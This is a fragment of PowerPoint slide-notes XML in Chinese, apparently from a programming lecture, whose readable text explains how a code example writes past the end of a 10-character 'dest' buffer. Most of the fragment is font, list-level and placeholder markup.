              </a:rPr>
              <a:t>source</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="宋体" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>的定义空间。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="宋体" charset="0"/>
              <a:ea typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="宋体" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="宋体" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>、第四行得到的</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="宋体" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>dest</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="宋体" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>还是</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="宋体" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>10</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="宋体" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>个</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="宋体" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>char</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="宋体" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>空间；</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="宋体" charset="0"/>
              <a:ea typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="宋体" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="宋体" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>、第五到</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="宋体" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>7</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="宋体" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>行，从</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="宋体" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="宋体" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>开始到</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="宋体" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>11</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="宋体" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>，下标实际超出了</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="宋体" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="宋体" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>个，</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="宋体" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>10</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="宋体" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="宋体" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>11</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="宋体" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>其实就是超过的</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="宋体" charset="0"/>
              <a:ea typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="宋体" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="宋体" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>、第</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="宋体" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>8</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="宋体" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>行就是</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="宋体" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>12</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="宋体" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>了，更是超过了。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="页眉占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="hdr" sz="quarter"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>*</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1300" i="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="日期占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>07/16/96</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1300" i="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="页脚占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>*</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1300" i="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="灯片编号占位符 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>##</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1300" i="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3510635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822" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="761419" indent="-292854" defTabSz="990822" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1171414" indent="-234283" defTabSz="990822" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1639980" indent="-234283" defTabSz="990822" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2108547" indent="-234283" defTabSz="990822" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2577112" indent="-234283" algn="ctr" defTabSz="990822" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="3045678" indent="-234283" algn="ctr" defTabSz="990822" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3514245" indent="-234283" algn="ctr" defTabSz="990822" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="3982810" indent="-234283" algn="ctr" defTabSz="990822" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:fld id="{7542206E-FEE6-0E4E-AA18-2395F4DA5A68}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" sz="1300"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="13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atin typeface="Times New Roman" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1033943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r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>*</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1300" i="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="日期占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>07/16/96</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1300" i="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="页脚占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>*</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1300" i="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="灯片编号占位符 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>##</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1300" i="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1418042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页眉占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="hdr" sz="quarter"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>*</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1300" i="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="日期占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>07/16/96</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1300" i="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="页脚占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>*</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1300" i="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="灯片编号占位符 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>##</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1300" i="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2624998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0822" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="761419" indent="-292854" defTabSz="990822" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1171414" indent="-234283" defTabSz="990822" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1639980" indent="-234283" defTabSz="990822" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2108547" indent="-234283" defTabSz="990822" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2577112" indent="-234283" algn="ctr" defTabSz="990822" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="3045678" indent="-234283" algn="ctr" defTabSz="990822" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3514245" indent="-234283" algn="ctr" defTabSz="990822" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="3982810" indent="-234283" algn="ctr" defTabSz="990822" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:fld id="{51785A78-F791-EF42-8AAB-971A09492557}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" sz="1300"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="13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eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
